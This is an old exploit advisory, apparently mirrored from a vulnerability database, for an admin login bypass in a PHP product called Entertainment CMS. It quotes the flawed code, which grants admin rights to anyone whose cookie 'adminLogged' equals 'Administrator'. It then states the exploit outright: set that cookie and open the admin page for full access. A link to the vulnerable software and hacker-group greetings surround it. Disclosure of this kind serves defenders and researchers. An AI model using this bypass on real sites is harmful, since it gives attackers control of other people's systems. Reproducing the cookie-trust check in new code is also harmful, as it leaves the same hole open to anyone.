Entertainment CMS Admin Login Bypass

2007-07-1000:00:00

vulners.com

JSON

Web: Entertainment CMS
Demo : http://multimedia.mydlstore.net/
Download: http://rapidshare.com/files/39640099/enter-cms.rar

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

Vulnerable codE:

$adminOK=0;

if &#40;isset&#40;$_POST[&quot;adminUser&quot;]&#41;&#41; {
    if &#40;&#40;$_POST[&quot;adminUser&quot;]==$adminUser&#41; &amp;&amp; &#40;$_POST[&quot;adminPass&quot;]==$adminPass&#41;&#41; {
        setcookie&#40;&quot;adminLogged&quot;,&quot;Administrator&quot;, NULL, &quot;/&quot;&#41;;
        $adminOK=1;
    }
}

if &#40;&#40;isset&#40;$_COOKIE[&quot;adminLogged&quot;]&#41;&#41; &amp;&amp; &#40;$_COOKIE[&quot;adminLogged&quot;]==&quot;Administrator&quot;&#41;&#41; {
    $adminOK=1;
}

Exploit:
Set your cookie: adminLogged=Administrator then g0 to http:/site.com/admin/ and you have full admin access

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ] [ RST will be back s00n ]

JSON